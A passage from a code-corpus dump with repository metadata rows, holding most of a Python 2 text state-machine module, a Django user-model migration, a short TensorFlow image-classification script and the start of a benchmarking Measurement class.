src, srcoffset = self.input_lines.info(offset)
srcline = srcoffset + 1
except (TypeError):
# line is None if index is "Just past the end"
src, srcline = self.get_source_and_line(offset + self.input_offset)
return src, srcline + 1
except (IndexError): # `offset` is off the list
src, srcline = None, None
# raise AssertionError('cannot find line %d in %s lines' %
# (offset, len(self.input_lines)))
# # list(self.input_lines.lines())))
# assert offset == srcoffset, str(self.input_lines)
# print "get_source_and_line(%s):" % lineno,
# print offset + 1, '->', src, srcline
# print self.input_lines
return (src, srcline)
def insert_input(self, input_lines, source):
self.input_lines.insert(self.line_offset + 1, '',
source='internal padding after '+source,
offset=len(input_lines))
self.input_lines.insert(self.line_offset + 1, '',
source='internal padding before '+source,
offset=-1)
self.input_lines.insert(self.line_offset + 2,
StringList(input_lines, source))
def get_text_block(self, flush_left=0):
"""
Return a contiguous block of text.
If `flush_left` is true, raise `UnexpectedIndentationError` if an
indented line is encountered before the text block ends (with a blank
line).
"""
try:
block = self.input_lines.get_text_block(self.line_offset,
flush_left)
self.next_line(len(block) - 1)
return block
except UnexpectedIndentationError, error:
block, source, lineno = error.args
self.next_line(len(block) - 1) # advance to last line of block
raise
def check_line(self, context, state, transitions=None):
"""
Examine one line of input for a transition match & execute its method.
Parameters:
- `context`: application-dependent storage.
- `state`: a `State` object, the current state.
- `transitions`: an optional ordered list of transition names to try,
instead of ``state.transition_order``.
Return the values returned by the transition method:
- context: possibly modified from the parameter `context`;
- next state name (`State` subclass name);
- the result output of the transition, a list.
When there is no match, ``state.no_match()`` is called and its return
value is returned.
"""
if transitions is None:
transitions = state.transition_order
state_correction = None
if self.debug:
print >>sys.stderr, (
'\nStateMachine.check_line: state="%s", transitions=%r.'
% (state.__class__.__name__, transitions))
for name in transitions:
pattern, method, next_state = state.transitions[name]
match = pattern.match(self.line)
if match:
if self.debug:
print >>sys.stderr, (
'\nStateMachine.check_line: Matched transition '
'"%s" in state "%s".'
% (name, state.__class__.__name__))
return method(match, context, next_state)
else:
if self.debug:
print >>sys.stderr, (
'\nStateMachine.check_line: No match in state "%s".'
% state.__class__.__name__)
return state.no_match(context, transitions)
def add_state(self, state_class):
"""
Initialize & add a `state_class` (`State` subclass) object.
Exception: `DuplicateStateError` raised if `state_class` was already
added.
"""
statename = state_class.__name__
if statename in self.states:
raise DuplicateStateError(statename)
self.states[statename] = state_class(self, self.debug)
def add_states(self, state_classes):
"""
Add `state_classes` (a list of `State` subclasses).
"""
for state_class in state_classes:
self.add_state(state_class)
def runtime_init(self):
"""
Initialize `self.states`.
"""
for state in self.states.values():
state.runtime_init()
def error(self):
"""Report error details."""
type, value, module, line, function = _exception_data()
print >>sys.stderr, '%s: %s' % (type, value)
print >>sys.stderr, 'input line %s' % (self.abs_line_number())
print >>sys.stderr, ('module %s, line %s, function %s'
% (module, line, function))
def attach_observer(self, observer):
"""
The `observer` parameter is a function or bound method which takes two
arguments, the source and offset of the current line.
"""
self.observers.append(observer)
def detach_observer(self, observer):
self.observers.remove(observer)
def notify_observers(self):
for observer in self.observers:
try:
info = self.input_lines.info(self.line_offset)
except IndexError:
info = (None, None)
observer(*info)
class State:
"""
State superclass. Contains a list of transitions, and transition methods.
Transition methods all have the same signature. They take 3 parameters:
- An `re` match object. ``match.string`` contains the matched input line,
``match.start()`` gives the start index of the match, and
``match.end()`` gives the end index.
- A context object, whose meaning is application-defined (initial value
``None``). It can be used to store any information required by the state
machine, and the retured context is passed on to the next transition
method unchanged.
- The name of the next state, a string, taken from the transitions list;
normally it is returned unchanged, but it may be altered by the
transition method if necessary.
Transition methods all return a 3-tuple:
- A context object, as (potentially) modified by the transition method.
- The next state name (a return value of ``None`` means no state change).
- The processing result, a list, which is accumulated by the state
machine.
Transition methods may raise an `EOFError` to cut processing short.
There are two implicit transitions, and corresponding transition methods
are defined: `bof()` handles the beginning-of-file, and `eof()` handles
the end-of-file. These methods have non-standard signatures and return
values. `bof()` returns the initial context and results, and may be used
to return a header string, or do any other processing needed. `eof()`
should handle any remaining context and wrap things up; it returns the
final processing result.
Typical applications need only subclass `State` (or a subclass), set the
`patterns` and `initial_transitions` class attributes, and provide
corresponding transition methods. The default object initialization will
take care of constructing the list of transitions.
"""
patterns = None
"""
{Name: pattern} mapping, used by `make_transition()`. Each pattern may
be a string or a compiled `re` pattern. Override in subclasses.
"""
initial_transitions = None
"""
A list of transitions to initialize when a `State` is instantiated.
Each entry is either a transition name string, or a (transition name, next
state name) pair. See `make_transitions()`. Override in subclasses.
"""
nested_sm = None
"""
The `StateMachine` class for handling nested processing.
If left as ``None``, `nested_sm` defaults to the class of the state's
controlling state machine. Override it in subclasses to avoid the default.
"""
nested_sm_kwargs = None
"""
Keyword arguments dictionary, passed to the `nested_sm` constructor.
Two keys must have entries in the dictionary:
- Key 'state_classes' must be set to a list of `State` classes.
- Key 'initial_state' must be set to the name of the initial state class.
If `nested_sm_kwargs` is left as ``None``, 'state_classes' defaults to the
class of the current state, and 'initial_state' defaults to the name of
the class of the current state. Override in subclasses to avoid the
defaults.
"""
def __init__(self, state_machine, debug=0):
"""
Initialize a `State` object; make & add initial transitions.
Parameters:
- `statemachine`: the controlling `StateMachine` object.
- `debug`: a boolean; produce verbose output if true (nonzero).
"""
self.transition_order = []
"""A list of transition names in search order."""
self.transitions = {}
"""
A mapping of transition names to 3-tuples containing
(compiled_pattern, transition_method, next_state_name). Initialized as
an instance attribute dynamically (instead of as a class attribute)
because it may make forward references to patterns and methods in this
or other classes.
"""
self.add_initial_transitions()
self.state_machine = state_machine
"""A reference to the controlling `StateMachine` object."""
self.debug = debug
"""Debugging mode on/off."""
if self.nested_sm is None:
self.nested_sm = self.state_machine.__class__
if self.nested_sm_kwargs is None:
self.nested_sm_kwargs = {'state_classes': [self.__class__],
'initial_state': self.__class__.__name__}
def runtime_init(self):
"""
Initialize this `State` before running the state machine; called from
`self.state_machine.run()`.
"""
pass
def unlink(self):
"""Remove circular references to objects no longer required."""
self.state_machine = None
def add_initial_transitions(self):
"""Make and add transitions listed in `self.initial_transitions`."""
if self.initial_transitions:
names, transitions = self.make_transitions(
self.initial_transitions)
self.add_transitions(names, transitions)
def add_transitions(self, names, transitions):
"""
Add a list of transitions to the start of the transition list.
Parameters:
- `names`: a list of transition names.
- `transitions`: a mapping of names to transition tuples.
Exceptions: `DuplicateTransitionError`, `UnknownTransitionError`.
"""
for name in names:
if name in self.transitions:
raise DuplicateTransitionError(name)
if name not in transitions:
raise UnknownTransitionError(name)
self.transition_order[:0] = names
self.transitions.update(transitions)
def add_transition(self, name, transition):
"""
Add a transition to the start of the transition list.
Parameter `transition`: a ready-made transition 3-tuple.
Exception: `DuplicateTransitionError`.
"""
if name in self.transitions:
raise DuplicateTransitionError(name)
self.transition_order[:0] = [name]
self.transitions[name] = transition
def remove_transition(self, name):
"""
Remove a transition by `name`.
Exception: `UnknownTransitionError`.
"""
try:
del self.transitions[name]
self.transition_order.remove(name)
except:
raise UnknownTransitionError(name)
def make_transition(self, name, next_state=None):
"""
Make & return a transition tuple based on `name`.
This is a convenience function to simplify transition creation.
Parameters:
- `name`: a string, the name of the transition pattern & method. This
`State` object must have a method called '`name`', and a dictionary
`self.patterns` containing a key '`name`'.
- `next_state`: a string, the name of the next `State` object for this
transition. A value of ``None`` (or absent) implies no state change
(i.e., continue with the same state).
Exceptions: `TransitionPatternNotFound`, `TransitionMethodNotFound`.
"""
if next_state is None:
next_state = self.__class__.__name__
try:
pattern = self.patterns[name]
if not hasattr(pattern, 'match'):
pattern = re.compile(pattern)
except KeyError:
raise TransitionPatternNotFound(
'%s.patterns[%r]' % (self.__class__.__name__, name))
try:
method = getattr(self, name)
except AttributeError:
raise TransitionMethodNotFound(
'%s.%s' % (self.__class__.__name__, name))
return (pattern, method, next_state)
def make_transitions(self, name_list):
"""
Return a list of transition names and a transition mapping.
Parameter `name_list`: a list, where each entry is either a transition
name string, or a 1- or 2-tuple (transition name, optional next state
name).
"""
stringtype = type('')
names = []
transitions = {}
for namestate in name_list:
if type(namestate) is stringtype:
transitions[namestate] = self.make_transition(namestate)
names.append(namestate)
else:
transitions[namestate[0]] = self.make_transition(*namestate)
names.append(namestate[0])
return names, transitions
def no_match(self, context, transitions):
"""
Called when there is no match from `StateMachine.check_line()`.
Return the same values returned by transition methods:
- context: unchanged;
- next state name: ``None``;
- empty result list.
Override in subclasses to catch this event.
"""
return context, None, []
def bof(self, context):
"""
Handle beginning-of-file. Return unchanged `context`, empty result.
Override in subclasses.
Parameter `context`: application-defined storage.
"""
return context, []
def eof(self, context):
"""
Handle end-of-file. Return empty result.
Override in subclasses.
Parameter `context`: application-defined storage.
"""
return []
def nop(self, match, context, next_state):
"""
A "do nothing" transition method.
Return unchanged `context` & `next_state`, empty result. Useful for
simple state changes (actionless transitions).
"""
return context, next_state, []
class StateMachineWS(StateMachine):
"""
`StateMachine` subclass specialized for whitespace recognition.
There are three methods provided for extracting indented text blocks:
- `get_indented()`: use when the indent is unknown.
- `get_known_indented()`: use when the indent is known for all lines.
- `get_first_known_indented()`: use when only the first line's indent is
known.
"""
def get_indented(self, until_blank=0, strip_indent=1):
"""
Return a block of indented lines of text, and info.
Extract an indented block where the indent is unknown for all lines.
:Parameters:
- `until_blank`: Stop collecting at the first blank line if true
(1).
- `strip_indent`: Strip common leading indent if true (1,
default).
:Return:
- the indented block (a list of lines of text),
- its indent,
- its first line offset from BOF, and
- whether or not it finished with a blank line.
"""
offset = self.abs_line_offset()
indented, indent, blank_finish = self.input_lines.get_indented(
self.line_offset, until_blank, strip_indent)
if indented:
self.next_line(len(indented) - 1) # advance to last indented line
while indented and not indented[0].strip():
indented.trim_start()
offset += 1
return indented, indent, offset, blank_finish
def get_known_indented(self, indent, until_blank=0, strip_indent=1):
"""
Return an indented block and info.
Extract an indented block where the indent is known for all lines.
Starting with the current line, extract the entire text block with at
least `indent` indentation (which must be whitespace, except for the
first line).
:Parameters:
- `indent`: The number of indent columns/characters.
- `until_blank`: Stop collecting at the first blank line if true
(1).
- `strip_indent`: Strip `indent` characters of indentation if true
(1, default).
:Return:
- the indented block,
- its first line offset from BOF, and
- whether or not it finished with a blank line.
"""
offset = self.abs_line_offset()
indented, indent, blank_finish = self.input_lines.get_indented(
self.line_offset, until_blank, strip_indent,
block_indent=indent)
self.next_line(len(indented) - 1) # advance to last indented line
while indented and not indented[0].strip():
indented.trim_start()
offset += 1
return indented, offset, blank_finish
def get_first_known_indented(self, indent, until_blank=0, strip_indent=1,
strip_top=1):
"""
Return an indented block and info.
Extract an indented block where the indent is known for the first line
and unknown for all other lines.
:Parameters:
- `indent`: The first line's indent (# of columns/characters).
- `until_blank`: Stop collecting at the first blank line if true
(1).
- `strip_indent`: Strip `indent` characters of indentation if true
(1, default).
- `strip_top`: Strip blank lines from the beginning of the block.
:Return:
- the indented block,
- its indent,
- its first line offset from BOF, and
- whether or not it finished with a blank line.
"""
offset = self.abs_line_offset()
indented, indent, blank_finish = self.input_lines.get_indented(
self.line_offset, until_blank, strip_indent,
first_indent=indent)
self.next_line(len(indented) - 1) # advance to last indented line
if strip_top:
while indented and not indented[0].strip():
indented.trim_start()
offset += 1
return indented, indent, offset, blank_finish
class StateWS(State):
"""
State superclass specialized for whitespace (blank lines & indents).
Use this class with `StateMachineWS`. The transitions 'blank' (for blank
lines) and 'indent' (for indented text blocks) are added automatically,
before any other transitions. The transition method `blank()` handles
blank lines and `indent()` handles nested indented blocks. Indented
blocks trigger a new state machine to be created by `indent()` and run.
The class of the state machine to be created is in `indent_sm`, and the
constructor keyword arguments are in the dictionary `indent_sm_kwargs`.
The methods `known_indent()` and `firstknown_indent()` are provided for
indented blocks where the indent (all lines' and first line's only,
respectively) is known to the transition method, along with the attributes
`known_indent_sm` and `known_indent_sm_kwargs`. Neither transition method
is triggered automatically.
"""
indent_sm = None
"""
The `StateMachine` class handling indented text blocks.
If left as ``None``, `indent_sm` defaults to the value of
`State.nested_sm`. Override it in subclasses to avoid the default.
"""
indent_sm_kwargs = None
"""
Keyword arguments dictionary, passed to the `indent_sm` constructor.
If left as ``None``, `indent_sm_kwargs` defaults to the value of
`State.nested_sm_kwargs`. Override it in subclasses to avoid the default.
"""
known_indent_sm = None
"""
The `StateMachine` class handling known-indented text blocks.
If left as ``None``, `known_indent_sm` defaults to the value of
`indent_sm`. Override it in subclasses to avoid the default.
"""
known_indent_sm_kwargs = None
"""
Keyword arguments dictionary, passed to the `known_indent_sm` constructor.
If left as ``None``, `known_indent_sm_kwargs` defaults to the value of
`indent_sm_kwargs`. Override it in subclasses to avoid the default.
"""
ws_patterns = {'blank': ' *$',
'indent': ' +'}
"""Patterns for default whitespace transitions. May be overridden in
subclasses."""
ws_initial_transitions = ('blank', 'indent')
"""Default initial whitespace transitions, added before those listed in
`State.initial_transitions`. May be overridden in subclasses."""
def __init__(self, state_machine, debug=0):
"""
Initialize a `StateSM` object; extends `State.__init__()`.
Check for indent state machine attributes, set defaults if not set.
"""
State.__init__(self, state_machine, debug)
if self.indent_sm is None:
self.indent_sm = self.nested_sm
if self.indent_sm_kwargs is None:
self.indent_sm_kwargs = self.nested_sm_kwargs
if self.known_indent_sm is None:
self.known_indent_sm = self.indent_sm
if self.known_indent_sm_kwargs is None:
self.known_indent_sm_kwargs = self.indent_sm_kwargs
def add_initial_transitions(self):
"""
Add whitespace-specific transitions before those defined in subclass.
Extends `State.add_initial_transitions()`.
"""
State.add_initial_transitions(self)
if self.patterns is None:
self.patterns = {}
self.patterns.update(self.ws_patterns)
names, transitions = self.make_transitions(
self.ws_initial_transitions)
self.add_transitions(names, transitions)
def blank(self, match, context, next_state):
"""Handle blank lines. Does nothing. Override in subclasses."""
return self.nop(match, context, next_state)
def indent(self, match, context, next_state):
"""
Handle an indented text block. Extend or override in subclasses.
Recursively run the registered state machine for indented blocks
(`self.indent_sm`).
"""
indented, indent, line_offset, blank_finish = \
self.state_machine.get_indented()
sm = self.indent_sm(debug=self.debug, **self.indent_sm_kwargs)
results = sm.run(indented, input_offset=line_offset)
return context, next_state, results
def known_indent(self, match, context, next_state):
"""
Handle a known-indent text block. Extend or override in subclasses.
Recursively run the registered state machine for known-indent indented
blocks (`self.known_indent_sm`). The indent is the length of the
match, ``match.end()``.
"""
indented, line_offset, blank_finish = \
self.state_machine.get_known_indented(match.end())
sm = self.known_indent_sm(debug=self.debug,
**self.known_indent_sm_kwargs)
results = sm.run(indented, input_offset=line_offset)
return context, next_state, results
def first_known_indent(self, match, context, next_state):
"""
Handle an indented text block (first line's indent known).
Extend or override in subclasses.
Recursively run the registered state machine for known-indent indented
blocks (`self.known_indent_sm`). The indent is the length of the
match, ``match.end()``.
"""
indented, line_offset, blank_finish = \
self.state_machine.get_first_known_indented(match.end())
sm = self.known_indent_sm(debug=self.debug,
**self.known_indent_sm_kwargs)
results = sm.run(indented, input_offset=line_offset)
return context, next_state, results
class _SearchOverride:
"""
Mix-in class to override `StateMachine` regular expression behavior.
Changes regular expression matching, from the default `re.match()`
(succeeds only if the pattern matches at the start of `self.line`) to
`re.search()` (succeeds if the pattern matches anywhere in `self.line`).
When subclassing a `StateMachine`, list this class **first** in the
inheritance list of the class definition.
"""
def match(self, pattern):
"""
Return the result of a regular expression search.
Overrides `StateMachine.match()`.
Parameter `pattern`: `re` compiled regular expression.
"""
return pattern.search(self.line)
class SearchStateMachine(_SearchOverride, StateMachine):
"""`StateMachine` which uses `re.search()` instead of `re.match()`."""
pass
class SearchStateMachineWS(_SearchOverride, StateMachineWS):
"""`StateMachineWS` which uses `re.search()` instead of `re.match()`."""
pass
class ViewList:
"""
List with extended functionality: slices of ViewList objects are child
lists, linked to their parents. Changes made to a child list also affect
the parent list. A child list is effectively a "view" (in the SQL sense)
of the parent list. Changes to parent lists, however, do *not* affect
active child lists. If a parent list is changed, any active child lists
should be recreated.
The start and end of the slice can be trimmed using the `trim_start()` and
`trim_end()` methods, without affecting the parent list. The link between
child and parent lists can be broken by calling `disconnect()` on the
child list.
Also, ViewList objects keep track of the source & offset of each item.
This information is accessible via the `source()`, `offset()`, and
`info()` methods.
"""
def __init__(self, initlist=None, source=None, items=None,
parent=None, parent_offset=None):
self.data = []
"""The actual list of data, flattened from various sources."""
self.items = []
"""A list of (source, offset) pairs, same length as `self.data`: the
source of each line and the offset of each line from the beginning of
its source."""
self.parent = parent
"""The parent list."""
self.parent_offset = parent_offset
"""Offset of this list from the beginning of the parent list."""
if isinstance(initlist, ViewList):
self.data = initlist.data[:]
self.items = initlist.items[:]
elif initlist is not None:
self.data = list(initlist)
if items:
self.items = items
else:
self.items = [(source, i) for i in range(len(initlist))]
assert len(self.data) == len(self.items), 'data mismatch'
def __str__(self):
return str(self.data)
def __repr__(self):
return '%s(%s, items=%s)' % (self.__class__.__name__,
self.data, self.items)
def __lt__(self, other): return self.data < self.__cast(other)
def __le__(self, other): return self.data <= self.__cast(other)
def __eq__(self, other): return self.data == self.__cast(other)
def __ne__(self, other): return self.data != self.__cast(other)
def __gt__(self, other): return self.data > self.__cast(other)
def __ge__(self, other): return self.data >= self.__cast(other)
def __cmp__(self, other): return cmp(self.data, self.__cast(other))
def __cast(self, other):
if isinstance(other, ViewList):
return other.data
else:
return other
def __contains__(self, item): return item in self.data
def __len__(self): return len(self.data)
# The __getitem__()/__setitem__() methods check whether the index
# is a slice first, since indexing a native list with a slice object
# just works.
def __getitem__(self, i):
if isinstance(i, types.SliceType):
assert i.step in (None, 1), 'cannot handle slice with stride'
return self.__class__(self.data[i.start:i.stop],
items=self.items[i.start:i.stop],
parent=self, parent_offset=i.start or 0)
else:
return self.data[i]
def __setitem__(self, i, item):
if isinstance(i, types.SliceType):
assert i.step in (None, 1), 'cannot handle slice with stride'
if not isinstance(item, ViewList):
raise TypeError('assigning non-ViewList to ViewList slice')
self.data[i.start:i.stop] = item.data
self.items[i.start:i.stop] = item.items
assert len(self.data) == len(self.items), 'data mismatch'
if self.parent:
self.parent[(i.start or 0) + self.parent_offset
: (i.stop or len(self)) + self.parent_offset] = item
else:
self.data[i] = item
if self.parent:
self.parent[i + self.parent_offset] = item
def __delitem__(self, i):
try:
del self.data[i]
del self.items[i]
if self.parent:
del self.parent[i + self.parent_offset]
except TypeError:
assert i.step is None, 'cannot handle slice with stride'
del self.data[i.start:i.stop]
del self.items[i.start:i.stop]
if self.parent:
del self.parent[(i.start or 0) + self.parent_offset
: (i.stop or len(self)) + self.parent_offset]
def __add__(self, other):
if isinstance(other, ViewList):
return self.__class__(self.data + other.data,
items=(self.items + other.items))
else:
raise TypeError('adding non-ViewList to a ViewList')
def __radd__(self, other):
if isinstance(other, ViewList):
return self.__class__(other.data + self.data,
items=(other.items + self.items))
else:
raise TypeError('adding ViewList to a non-ViewList')
def __iadd__(self, other):
if isinstance(other, ViewList):
self.data += other.data
else:
raise TypeError('argument to += must be a ViewList')
return self
def __mul__(self, n):
return self.__class__(self.data * n, items=(self.items * n))
__rmul__ = __mul__
def __imul__(self, n):
self.data *= n
self.items *= n
return self
def extend(self, other):
if not isinstance(other, ViewList):
raise TypeError('extending a ViewList with a non-ViewList')
if self.parent:
self.parent.insert(len(self.data) + self.parent_offset, other)
self.data.extend(other.data)
self.items.extend(other.items)
def append(self, item, source=None, offset=0):
if source is None:
self.extend(item)
else:
if self.parent:
self.parent.insert(len(self.data) + self.parent_offset, item,
source, offset)
self.data.append(item)
self.items.append((source, offset))
def insert(self, i, item, source=None, offset=0):
if source is None:
if not isinstance(item, ViewList):
raise TypeError('inserting non-ViewList with no source given')
self.data[i:i] = item.data
self.items[i:i] = item.items
if self.parent:
index = (len(self.data) + i) % len(self.data)
self.parent.insert(index + self.parent_offset, item)
else:
self.data.insert(i, item)
self.items.insert(i, (source, offset))
if self.parent:
index = (len(self.data) + i) % len(self.data)
self.parent.insert(index + self.parent_offset, item,
source, offset)
def pop(self, i=-1):
if self.parent:
index = (len(self.data) + i) % len(self.data)
self.parent.pop(index + self.parent_offset)
self.items.pop(i)
return self.data.pop(i)
def trim_start(self, n=1):
"""
Remove items from the start of the list, without touching the parent.
"""
if n > len(self.data):
raise IndexError("Size of trim too large; can't trim %s items "
"from a list of size %s." % (n, len(self.data)))
elif n < 0:
raise IndexError('Trim size must be >= 0.')
del self.data[:n]
del self.items[:n]
if self.parent:
self.parent_offset += n
def trim_end(self, n=1):
"""
Remove items from the end of the list, without touching the parent.
"""
if n > len(self.data):
raise IndexError("Size of trim too large; can't trim %s items "
"from a list of size %s." % (n, len(self.data)))
elif n < 0:
raise IndexError('Trim size must be >= 0.')
del self.data[-n:]
del self.items[-n:]
def remove(self, item):
index = self.index(item)
del self[index]
def count(self, item): return self.data.count(item)
def index(self, item): return self.data.index(item)
def reverse(self):
self.data.reverse()
self.items.reverse()
self.parent = None
def sort(self, *args):
tmp = zip(self.data, self.items)
tmp.sort(*args)
self.data = [entry[0] for entry in tmp]
self.items = [entry[1] for entry in tmp]
self.parent = None
def info(self, i):
"""Return source & offset for index `i`."""
try:
return self.items[i]
except IndexError:
if i == len(self.data): # Just past the end
return self.items[i - 1][0], None
else:
raise
def source(self, i):
"""Return source for index `i`."""
return self.info(i)[0]
def offset(self, i):
"""Return offset for index `i`."""
return self.info(i)[1]
def disconnect(self):
"""Break link between this list and parent list."""
self.parent = None
def xitems(self):
"""Return iterator yielding (source, offset, value) tuples."""
for (value, (source, offset)) in zip(self.data, self.items):
yield (source, offset, value)
def pprint(self):
"""Print the list in `grep` format (`source:offset:value` lines)"""
for line in self.xitems():
print "%s:%d:%s" % line
class StringList(ViewList):
"""A `ViewList` with string-specific methods."""
def trim_left(self, length, start=0, end=sys.maxint):
"""
Trim `length` characters off the beginning of each item, in-place,
from index `start` to `end`. No whitespace-checking is done on the
trimmed text. Does not affect slice parent.
"""
self.data[start:end] = [line[length:]
for line in self.data[start:end]]
def get_text_block(self, start, flush_left=0):
"""
Return a contiguous block of text.
If `flush_left` is true, raise `UnexpectedIndentationError` if an
indented line is encountered before the text block ends (with a blank
line).
"""
end = start
last = len(self.data)
while end < last:
line = self.data[end]
if not line.strip():
break
if flush_left and (line[0] == ' '):
source, offset = self.info(end)
raise UnexpectedIndentationError(self[start:end], source,
offset + 1)
end += 1
return self[start:end]
def get_indented(self, start=0, until_blank=0, strip_indent=1,
block_indent=None, first_indent=None):
"""
Extract and return a StringList of indented lines of text.
Collect all lines with indentation, determine the minimum indentation,
remove the minimum indentation from all indented lines (unless
`strip_indent` is false), and return them. All lines up to but not
including the first unindented line will be returned.
:Parameters:
- `start`: The index of the first line to examine.
- `until_blank`: Stop collecting at the first blank line if true.
- `strip_indent`: Strip common leading indent if true (default).
- `block_indent`: The indent of the entire block, if known.
- `first_indent`: The indent of the first line, if known.
:Return:
- a StringList of indented lines with mininum indent removed;
- the amount of the indent;
- a boolean: did the indented block finish with a blank line or EOF?
"""
indent = block_indent # start with None if unknown
end = start
if block_indent is not None and first_indent is None:
first_indent = block_indent
if first_indent is not None:
end += 1
last = len(self.data)
while end < last:
line = self.data[end]
if line and (line[0] != ' '
or (block_indent is not None
and line[:block_indent].strip())):
# Line not indented or insufficiently indented.
# Block finished properly iff the last indented line blank:
blank_finish = ((end > start)
and not self.data[end - 1].strip())
break
stripped = line.lstrip()
if not stripped: # blank line
if until_blank:
blank_finish = 1
break
elif block_indent is None:
line_indent = len(line) - len(stripped)
if indent is None:
indent = line_indent
else:
indent = min(indent, line_indent)
end += 1
else:
blank_finish = 1 # block ends at end of lines
block = self[start:end]
if first_indent is not None and block:
block.data[0] = block.data[0][first_indent:]
if indent and strip_indent:
block.trim_left(indent, start=(first_indent is not None))
return block, indent or 0, blank_finish
def get_2D_block(self, top, left, bottom, right, strip_indent=1):
block = self[top:bottom]
indent = right
for i in range(len(block.data)):
block.data[i] = line = block.data[i][left:right].rstrip()
if line:
indent = min(indent, len(line) - len(line.lstrip()))
if strip_indent and 0 < indent < right:
block.data = [line[indent:] for line in block.data]
return block
def pad_double_width(self, pad_char):
"""
Pad all double-width characters in self by appending `pad_char` to each.
For East Asian language support.
"""
if hasattr(unicodedata, 'east_asian_width'):
east_asian_width = unicodedata.east_asian_width
else:
return # new in Python 2.4
for i in range(len(self.data)):
line = self.data[i]
if isinstance(line, unicode):
new = []
for char in line:
new.append(char)
if east_asian_width(char) in 'WF': # 'W'ide & 'F'ull-width
new.append(pad_char)
self.data[i] = ''.join(new)
def replace(self, old, new):
"""Replace all occurrences of substring `old` with `new`."""
for i in range(len(self.data)):
self.data[i] = self.data[i].replace(old, new)
class StateMachineError(Exception): pass
class UnknownStateError(StateMachineError): pass
class DuplicateStateError(StateMachineError): pass
class UnknownTransitionError(StateMachineError): pass
class DuplicateTransitionError(StateMachineError): pass
class TransitionPatternNotFound(StateMachineError): pass
class TransitionMethodNotFound(StateMachineError): pass
class UnexpectedIndentationError(StateMachineError): pass
class TransitionCorrection(Exception):
"""
Raise from within a transition method to switch to another transition.
Raise with one argument, the new transition name.
"""
class StateCorrection(Exception):
"""
Raise from within a transition method to switch to another state.
Raise with one or two arguments: new state name, and an optional new
transition name.
"""
def string2lines(astring, tab_width=8, convert_whitespace=0,
whitespace=re.compile('[\v\f]')):
"""
Return a list of one-line strings with tabs expanded, no newlines, and
trailing whitespace stripped.
Each tab is expanded with between 1 and `tab_width` spaces, so that the
next character's index becomes a multiple of `tab_width` (8 by default).
Parameters:
- `astring`: a multi-line string.
- `tab_width`: the number of columns between tab stops.
- `convert_whitespace`: convert form feeds and vertical tabs to spaces?
"""
if convert_whitespace:
astring = whitespace.sub(' ', astring)
return [s.expandtabs(tab_width).rstrip() for s in astring.splitlines()]
def _exception_data():
"""
Return exception information:
- the exception's class name;
- the exception object;
- the name of the file containing the offending code;
- the line number of the offending code;
- the function name of the offending code.
"""
type, value, traceback = sys.exc_info()
while traceback.tb_next:
traceback = traceback.tb_next
code = traceback.tb_frame.f_code
return (type.__name__, value, code.co_filename, traceback.tb_lineno,
code.co_name)
| [
"akio.xd@gmail.com"
] | akio.xd@gmail.com |
0beec97f573151df61de82f9967c3d1b03d1668c | 46a1ff4b289e95691b7525cb4b6b1e5688c58f55 | /users/migrations/0017_auto_20180411_2134.py | 6c695bf0313e39afda5a16dbaf00ce4719d20d29 | [] | no_license | hakujyo/blogproject | cc1293a9fe8bee283d9a9ea7abb90f7e2ef40629 | 3aa1c680bde9eb2249d96a0028a135305cc5863d | refs/heads/master | 2021-09-15T00:28:21.445134 | 2018-05-22T20:32:57 | 2018-05-22T20:32:57 | 114,651,181 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 453 | py | # Generated by Django 2.0 on 2018-04-11 13:34
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0016_auto_20180411_1603'),
]
operations = [
migrations.AlterField(
model_name='user',
name='friends',
field=models.ManyToManyField(to=settings.AUTH_USER_MODEL),
),
]
| [
"hakujyo0518@gmail.com"
] | hakujyo0518@gmail.com |
33ee38e07d156d430139a621d07d3c3ca342f8c7 | 3c6b74eaeacb72a4de4af17eeab76889a78c5b56 | /tensorflow/testClassify.py | 24b6d069785414f3040dabff98ad31c0c1b79356 | [] | no_license | tkz1996/selfdrivingcar | 86aaad9b43e9b1fb2a261b9fcf56bc4a8e05de72 | 928bc11797036deb46342e5ca5cb990d38ebabe6 | refs/heads/master | 2023-06-16T14:16:58.350637 | 2021-07-16T15:45:43 | 2021-07-16T15:45:43 | 338,084,046 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | import tensorflow as tf
from tensorflow import keras
import numpy as np
from cv2 import imread, IMREAD_GRAYSCALE
pathToFolder = 'laneDirectionModel/'
model = keras.models.load_model(pathToFolder)
model.summary()
image = imread('test.jpg', IMREAD_GRAYSCALE)
image = np.expand_dims(image, -1)
image = np.expand_dims(image, 0)
predictions = model.predict(image, verbose=1)
print(predictions) | [
"tkz1996@live.com"
] | tkz1996@live.com |
f60472dc9f2c47ee9077d7de07554b3dae6f0215 | 5c72f7709e501bd0ca3c5dc1e1f21cfffda13582 | /rebench/model/measurement.py | 40af4d69df6564115af83afce35a6769e7585c55 | [] | no_license | lhoste-bell/ReBench | 74ccb400aa5f262b56659afac3b7db873bd6a8d2 | 0f5c678b045b5208e9a2bed01629c780bef52da5 | refs/heads/master | 2021-01-17T07:57:14.440676 | 2016-05-23T19:25:58 | 2016-05-23T19:25:58 | 60,706,933 | 0 | 0 | null | 2016-06-08T15:06:26 | 2016-06-08T15:06:25 | null | UTF-8 | Python | false | false | 2,563 | py | # Copyright (c) 2009-2014 Stefan Marr <http://www.stefan-marr.de/>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from datetime import datetime
from .run_id import RunId
class Measurement(object):
def __init__(self, value, unit, run_id, criterion = 'total',
timestamp = None):
self._run_id = run_id
self._criterion = criterion
self._value = value
self._unit = unit
